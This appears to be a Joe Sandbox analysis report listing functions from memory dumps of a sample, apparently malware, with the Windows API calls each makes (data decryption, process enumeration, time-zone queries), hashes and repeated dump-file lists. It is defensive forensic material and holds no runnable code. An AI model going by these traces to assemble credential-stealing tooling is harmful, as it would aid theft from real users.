                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 025ce30b116498f3555451225bc9e2bf912ca8ac83244745ec40117e399acc82
                    • Instruction ID: c92870f69fa8995d5b87a724b43aa4b80f3e7e1d9fc07e641a09be7f5a11014a
                    • Opcode Fuzzy Hash: 025ce30b116498f3555451225bc9e2bf912ca8ac83244745ec40117e399acc82
                    • Instruction Fuzzy Hash: 65316F71901258ABCB24DF51CC85FEEF7B8EB44700F1041EAE509B22A0EB716E45CFA1
                    Function 00BD8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00BC5184,40000001,00000000,00000000,?,00BC5184), ref: 00BD8EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: be958b89e510f6498b28fd65db7c0b4e6f457c8ac2ce79bafb82fc99c8c4d505
                    • Instruction ID: 437a2de6a1195ebcea097bce7bad99ad3747a0b975da55e5050ab0be4365887f
                    • Opcode Fuzzy Hash: be958b89e510f6498b28fd65db7c0b4e6f457c8ac2ce79bafb82fc99c8c4d505
                    • Instruction Fuzzy Hash: B2110A74200208BFDB04CF65E884FA673EAEF89301F149999F915CB350EB35E881DB60
                    Function 00BC9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9B2A
                    • LocalFree.KERNEL32(?,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B3F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID:
                    • API String ID: 4291131564-0
                    • Opcode ID: d7f522eb6cc3c7f8461a0d6f2245c6eab71b7af6eb9db060d7a14d70935f141e
                    • Instruction ID: 938fa81a2e110d6ef159e16541687762bf1e40e34a1c1f8533c1f6ff47c11806
                    • Opcode Fuzzy Hash: d7f522eb6cc3c7f8461a0d6f2245c6eab71b7af6eb9db060d7a14d70935f141e
                    • Instruction Fuzzy Hash: 6011A4B4240308BFEB14CF64DC99FAA77B5FB89700F208058F915AB390C776A941CB50
                    Function 00BD7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BE0E00,00000000,?), ref: 00BD79B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD79B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00BE0E00,00000000,?), ref: 00BD79C4
                    • wsprintfA.USER32 ref: 00BD79F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: f86e5986f830a31065e0d0bd7dd3fec35404fa53178a76a979d1ca444033a29b
                    • Instruction ID: 68413404da2fab1ff37b127ae96b19e8f2bef7e5dd5a08e8d0dc37222f940e27
                    • Opcode Fuzzy Hash: f86e5986f830a31065e0d0bd7dd3fec35404fa53178a76a979d1ca444033a29b
                    • Instruction Fuzzy Hash: EF115AB2904218ABCB14DFCADD44BBEB7F8FB4CB11F04415AF601B2280E23A5944C7B1
                    Function 00BD7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013CE248,00000000,?,00BE0E10,00000000,?,00000000,00000000), ref: 00BD7A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD7A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013CE248,00000000,?,00BE0E10,00000000,?,00000000,00000000,?), ref: 00BD7A7D
                    • wsprintfA.USER32 ref: 00BD7AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: b069e980d001995f9d43823cbde4ef632d6869ffb16420ff100467e837c0e126
                    • Instruction ID: 4dbb6f5d12461368aef4e8189c456f0a1aa46f86de70b33d58b9ff7a790b9081
                    • Opcode Fuzzy Hash: b069e980d001995f9d43823cbde4ef632d6869ffb16420ff100467e837c0e126
                    • Instruction Fuzzy Hash: F611A0B0A45218DFDB108B55DC49F99B7B8FB04711F0042EAE506A3280D7741A84CB51
                    Function 00F89808 Relevance: 5.3, Strings: 3, Instructions: 1598COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: <6?w$l)og$1}
                    • API String ID: 0-392482550
                    • Opcode ID: 6e642820eb04e5c8497f56fdeac505c5644befcdd404bccc01ff58da07d1e5d3
                    • Instruction ID: f0dd800e7062338035ef2c77f99320794b7f6367431c4fcb8647d4e4bc4e8e6e
                    • Opcode Fuzzy Hash: 6e642820eb04e5c8497f56fdeac505c5644befcdd404bccc01ff58da07d1e5d3
                    • Instruction Fuzzy Hash: 03B216F360C2049FE3046E2DEC8577ABBE9EF94720F1A463DEAC583744EA3558058697
                    Function 00F8644C Relevance: 5.3, Strings: 3, Instructions: 1597COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2Cj$A{v$Y!y
                    • API String ID: 0-1802732071
                    • Opcode ID: 418a5f9b3925694aebda2d4fc1e4dd17713c8ddb53ad6558e4ec0afa6c94c35f
                    • Instruction ID: 9aa07e356623a46954cf2dc003126db866d486c114fe835d3cce3027110d225a
                    • Opcode Fuzzy Hash: 418a5f9b3925694aebda2d4fc1e4dd17713c8ddb53ad6558e4ec0afa6c94c35f
                    • Instruction Fuzzy Hash: 68A2F7F360C2049FE304AE2DEC8567ABBE9EF94720F16493DE6C4C7744EA3598058796
                    Function 00BD3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.COMBASE(00BDE118,00000000,00000001,00BDE108,00000000), ref: 00BD3758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BD37B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: 5db013d49d4924bfcb1e8759de2abd87e744cd7424bf1025b357b493f1a6f670
                    • Instruction ID: 5f1f9b49dc735a7164406dae6413128dbfb70ba4b67affbf284875826352efb6
                    • Opcode Fuzzy Hash: 5db013d49d4924bfcb1e8759de2abd87e744cd7424bf1025b357b493f1a6f670
                    • Instruction Fuzzy Hash: 8E41F970A00A189FDB24DB58CC95B9BB7B4BB48702F4081D9E618EB2D0E771AEC5CF51
                    Function 00BC9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BC9B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BC9BA3
                    • LocalFree.KERNEL32(?), ref: 00BC9BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    • Opcode ID: 405b14d288189dd55fef6e4a16b56d583003ba5ef13606a714f22ae561dc062e
                    • Instruction ID: 4a250260ba5902ed88ec173247d9ebd03dd51978c1b0e75f00faeb84d3e95df6
                    • Opcode Fuzzy Hash: 405b14d288189dd55fef6e4a16b56d583003ba5ef13606a714f22ae561dc062e
                    • Instruction Fuzzy Hash: 6E11E8B4A00209EFDB04DF94D989EAE77B5FB88300F1085A8E815A7350D775AE54CB61
                    Function 00F84D82 Relevance: 3.9, Strings: 2, Instructions: 1370COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: wu~K$(kw
                    • API String ID: 0-1060209229
                    • Opcode ID: d2f21acb2c691bf23d91614a9a61424ed6e2d0ebe13913e55cd59aafd3b40e5e
                    • Instruction ID: c5e1f5e69d65885d930f12b615ea8b6834e64a0d5168e6651bfdc3ec8651c102
                    • Opcode Fuzzy Hash: d2f21acb2c691bf23d91614a9a61424ed6e2d0ebe13913e55cd59aafd3b40e5e
                    • Instruction Fuzzy Hash: 039207F3A086009FE308AE2DEC8577AB7E5EF94720F16893DE6C5C7740E63558058697
                    Function 00EA13B1 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2Ym$rpk
                    • API String ID: 0-3215571682
                    • Opcode ID: d2fc79a7802c281af0e6be37574a4ea512799085d0309150652b8ab147b2b423
                    • Instruction ID: 63f21ad8bafb6f6313026c15b2da50d7f8006e1757fc8913cb137a4485fe11cf
                    • Opcode Fuzzy Hash: d2fc79a7802c281af0e6be37574a4ea512799085d0309150652b8ab147b2b423
                    • Instruction Fuzzy Hash: F7511AF39182109FE7586E2CDC9177ABBE9EB54321F1A493EDAC4D3344DA75480086C6
                    Function 00F7EC21 Relevance: 1.8, Strings: 1, Instructions: 506COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ZC%
                    • API String ID: 0-238729973
                    • Opcode ID: 63c1bb6e30dab81c2b31dc5323a0152c392243ac6f5a40867cf75ce5fc033b0c
                    • Instruction ID: 757fbe067512d8b5763a819797d3693019d5d709d756d84f30f387fb0039bc05
                    • Opcode Fuzzy Hash: 63c1bb6e30dab81c2b31dc5323a0152c392243ac6f5a40867cf75ce5fc033b0c
                    • Instruction Fuzzy Hash: B8F1C3F36086009FE7046E19EC8177AFBE6EFD4720F1A893DE6C487744DA3558058A97
                    Function 00F00EF3 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                    Download Yara Rule
